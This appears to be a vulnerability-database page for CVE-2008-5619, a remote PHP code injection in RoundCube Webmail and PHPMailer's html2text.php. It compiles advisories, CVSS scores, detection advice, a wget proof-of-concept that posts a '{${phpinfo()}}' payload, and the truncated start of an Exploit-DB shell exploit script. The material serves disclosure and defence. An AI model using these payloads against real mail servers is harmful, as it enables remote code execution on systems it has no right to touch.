CVE-2008-5619
published 2008-12-17CVE-2008-5619: html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara…
PriorityP270critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
54.00%
98.9th percentile
html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | roundcube | < roundcube 0.1.1-9 (bookworm) | roundcube 0.1.1-9 (bookworm) |
| phpmailer | phpmailer | >= 0 < 5.2.10 | 5.2.10 |
| roundcube | webmail | — | — |
| roundcube | webmail | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandwget -q --header="Content-Type: ''" -O - --post-data='{${phpinfo()}}' --no-check-certificate http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php↗
- →Monitor POST requests to bin/html2text.php or program/lib/html2text.php containing PHP curly/complex syntax payloads such as '{${...}}' in the POST body or HTTP headers (e.g., Accept header). ↗
- →Detect exploitation attempts where the HTTP Accept header contains Base64-encoded PHP code, as the exploit delivers its payload via BASE64_DECODE($_SERVER[HTTP_ACCEPT]). ↗
- →Alert on POST requests to html2text.php with body content matching the pattern '{${...}}' which triggers PHP code execution via preg_replace with the 'e' (eval) flag. ↗
- ·The exploit targets html2text.php only when it is directly accessible via HTTP POST; if the file is not web-accessible (e.g., restricted to CLI use only), the remote attack vector is eliminated. ↗
- ·PHP's disable_functions setting can limit post-exploitation impact (e.g., exec, system disabled), but does not prevent initial code execution via preg_replace eval. ↗
- ·PHP magic_quotes_gpc may complicate exploitation but can be bypassed using PHP curly syntax tricks to avoid single or double quotes. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0HIGH
vendor_redhat10.0CRITICAL
vendor_ubuntu6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Moodle vulnerabilities
vendor_ubuntu·2009-06-24·CVSS 6.8
CVE-2009-0500 [MEDIUM] Moodle vulnerabilities
Title: Moodle vulnerabilities
Summary: Moodle vulnerabilities
Thor Larholm discovered that PHPMailer, as used by Moodle, did not
correctly escape email addresses. A local attacker with direct access
to the Moodle database could exploit this to execute arbitrary commands
as the web server user. (CVE-2007-3215)
Nigel McNie discovered that fetching https URLs did not correctly escape
shell meta-characters. An authenticated remote attacker could execute
arbitrary commands as the web server user, if curl was installed and
configured. (CVE-2008-4796, MSA-09-0003)
It was discovered that Smarty (also included in Moodle), did not
correctly filter certain inputs. An authenticated remote attacker could
exploit this to execute arbitrary PHP commands as the web server user.
(CVE-2008-4810, CVE-2008
Red Hat
roundcubemail: Remotely exploitable code injection vulnerability
vendor_redhat·2008-12-09·CVSS 10.0
CVE-2008-5619 [CRITICAL] roundcubemail: Remotely exploitable code injection vulnerability
roundcubemail: Remotely exploitable code injection vulnerability
html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch.
Debian
CVE-2008-5619: roundcube - html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5...
vendor_debian·2008·CVSS 10.0
CVE-2008-5619 [CRITICAL] CVE-2008-5619: roundcube - html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5...
html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch.
Scope: local
bookworm: resolved (fixed in 0.1.1-9)
bullseye: resolved (fixed in 0.1.1-9)
forky: resolved (fixed in 0.1.1-9)
sid: resolved (fixed in 0.1.1-9)
trixie: resolved (fixed in 0.1.1-9)
OSV
PHPMailer susceptible to arbitrary code execution
osv·2022-05-14
CVE-2008-5619 [HIGH] PHPMailer susceptible to arbitrary code execution
PHPMailer susceptible to arbitrary code execution
html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch.
GHSA
PHPMailer susceptible to arbitrary code execution
ghsa·2022-05-14
CVE-2008-5619 [HIGH] CWE-94 PHPMailer susceptible to arbitrary code execution
PHPMailer susceptible to arbitrary code execution
html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch.
OSV
CVE-2008-5619: html2text
osv·2008-12-17·CVSS 10.0
CVE-2008-5619 [CRITICAL] CVE-2008-5619: html2text
html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch.
No detection rules found.
Exploit-DB
Roundcube Webmail 0.2b - Remote Code Execution
exploitdb·2008-12-22·CVSS 10.0
CVE-2008-5619 [CRITICAL] Roundcube Webmail 0.2b - Remote Code Execution
Roundcube Webmail 0.2b - Remote Code Execution
---
#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
echo 'Exploit for Roundcube Webmail =\r\n\n'
if [ "$2" = "" ]; then echo "
Usage:
$0
Example:
\$ $0 localhost /roundcube/bin/html2text.php
For https sites use stunnel or socat!
"; exit 1; fi
NETCATEXE=`which nc`
BASE64ENC=`which base64`
if [ "$NETCATEXE" = "" ] ||
Exploit-DB
Roundcube Webmail 0.2-3 Beta - Code Execution
exploitdb·2008-12-22·CVSS 10.0
CVE-2008-5619 [CRITICAL] Roundcube Webmail 0.2-3 Beta - Code Execution
Roundcube Webmail 0.2-3 Beta - Code Execution
---
Public Release Date of POC: 2008-12-22
Author: Jacobo Avariento Gimeno (Sofistic)
CVE id: CVE-2008-5619
Bugtraq id: 32799
Severity: Critical
Vulnerability reported by: RealMurphy
Intro
----
Roundcube Webmail is a browser-based IMAP client that uses
"chuggnutt.com HTML to Plain Text Conversion" library to convert
HTML text to plain text, this library uses the preg_replace PHP
function in an insecure manner.
Vulnerable versions:
Round Cube RoundCube Webmail 0.2-3 beta
Round Cube RoundCube Webmail 0.2-1 alpha (tested)
Analysis of the vulnerable code
----
The script bin/html2text.php creates an instance of the class html2text
with the given POST data, the problem arises in the file
program/lib/html2text.php in function _convert() on line
http://mahara.org/interaction/forum/topic.php?id=533http://osvdb.org/53893http://secunia.com/advisories/33145http://secunia.com/advisories/33170http://secunia.com/advisories/34789http://sourceforge.net/forum/forum.php?forum_id=898542http://trac.roundcube.net/changeset/2148http://trac.roundcube.net/ticket/1485618http://www.openwall.com/lists/oss-security/2008/12/12/1http://www.securityfocus.com/archive/1/499489/100/0/threadedhttp://www.vupen.com/english/advisories/2008/3418http://www.vupen.com/english/advisories/2008/3419https://github.com/PHPMailer/PHPMailer/commit/8beacc646acb67c995aea10ac5585970efc7355ahttps://www.exploit-db.com/exploits/7549https://www.exploit-db.com/exploits/7553https://www.redhat.com/archives/fedora-package-announce/2008-December/msg00783.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-December/msg00802.htmlhttp://mahara.org/interaction/forum/topic.php?id=533http://osvdb.org/53893http://secunia.com/advisories/33145http://secunia.com/advisories/33170http://secunia.com/advisories/34789http://sourceforge.net/forum/forum.php?forum_id=898542http://trac.roundcube.net/changeset/2148http://trac.roundcube.net/ticket/1485618http://www.openwall.com/lists/oss-security/2008/12/12/1http://www.securityfocus.com/archive/1/499489/100/0/threadedhttp://www.vupen.com/english/advisories/2008/3418http://www.vupen.com/english/advisories/2008/3419https://github.com/PHPMailer/PHPMailer/commit/8beacc646acb67c995aea10ac5585970efc7355ahttps://www.exploit-db.com/exploits/7549https://www.exploit-db.com/exploits/7553https://www.redhat.com/archives/fedora-package-announce/2008-December/msg00783.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-December/msg00802.html
2008-12-17
Published